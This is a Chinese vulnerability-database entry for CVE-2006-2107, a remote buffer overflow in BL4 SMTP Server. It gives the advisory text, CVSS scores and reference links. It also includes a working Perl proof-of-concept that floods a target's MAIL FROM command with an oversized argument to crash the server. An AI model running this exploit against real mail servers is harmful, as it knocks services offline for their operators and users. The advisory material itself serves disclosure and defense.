CVE-2006-2107
CVSS7.5
发布时间 :2006-04-29 06:02:00
修订时间 :2008-09-05 17:03:41
NMCOE    

[原文]Buffer overflow in BL4 SMTP Server 0.1.4 and earlier allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long argument to the (1) EHLO, (2) MAIL FROM, and (3) RCPT TO commands.


[CNNVD]BL4 SMTP Server远程缓冲区溢出漏洞(CNNVD-200604-552)

        BL4 SMTP Server是一款仅限入站的SMTP server。
        BL4 SMTP Server的SMTP服务处理客户端发送的命令参数时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。远程攻击者可以反复的发送多于2100字节的报文做为对EHLO、MAIL FROM和RCPT TO命令的参数,导致服务器崩溃或执行任意代码。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2107
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2107
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-552
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/26114
(UNKNOWN)  XF  bl4-smtp-bo(26114)
http://www.securityfocus.com/bid/17714
(UNKNOWN)  BID  17714
http://www.securityfocus.com/archive/1/archive/1/432329/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060427 BL4's SMTP server BufferOverflow Vulnerable
http://advisories.echo.or.id/adv/adv30-theday-2006.txt
(VENDOR_ADVISORY)  MISC  http://advisories.echo.or.id/adv/adv30-theday-2006.txt
http://securityreason.com/securityalert/809
(UNKNOWN)  SREASON  809

- 漏洞信息

BL4 SMTP Server远程缓冲区溢出漏洞
高危 缓冲区溢出
2006-04-29 00:00:00 2013-01-08 00:00:00
远程  
        BL4 SMTP Server是一款仅限入站的SMTP server。
        BL4 SMTP Server的SMTP服务处理客户端发送的命令参数时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。远程攻击者可以反复的发送多于2100字节的报文做为对EHLO、MAIL FROM和RCPT TO命令的参数,导致服务器崩溃或执行任意代码。
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0

- 漏洞信息 (1721)

BL4 SMTP Server < 0.1.5 Remote Buffer Overflow PoC (EDBID:1721)
windows dos
2006-04-27 Verified
0 Dedi Dwianto
N/A [点击下载]
#!/usr/bin/perl

use IO::Socket;
use Socket;

my($socket) = "";


if($#ARGV < 1 | $#ARGV > 2) {usage()}

if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" };
$adr = $ARGV[0];
$prt = $ARGV[1];

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";


        print " -- Connecting To SMTP server at $adr port $prt ... \n";

        sleep(1);

        print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to $adr .....\n" or die "Error : can't send Request\n";

        sleep(1);

        print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " -- Sending Buffer to $adr .....\n";

        sleep(1);
        printf("[+]Ok!\n");
        printf("[+]Crash service.....\n");
        printf("[~]Done.\n");

        close($socket);


sub usage()
 {
 print "\n=========================================\r\n";
 print "     BL4's SMTP server Remote DOS \r\n";
 print "=========================================\r\n";
 print "       Bug Found by Dedi Dwianto \r\n";
 print "    www.echo.or.id #e-c-h-o irc.dal.net \r\n";
 print "      Echo Security Research Group \r\n";
 print "=========================================\r\n";
 print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";
 exit();
 }

# milw0rm.com [2006-04-27]
		

- 漏洞信息

25290
BL4 SMTP Server Multiple Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-04-27 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站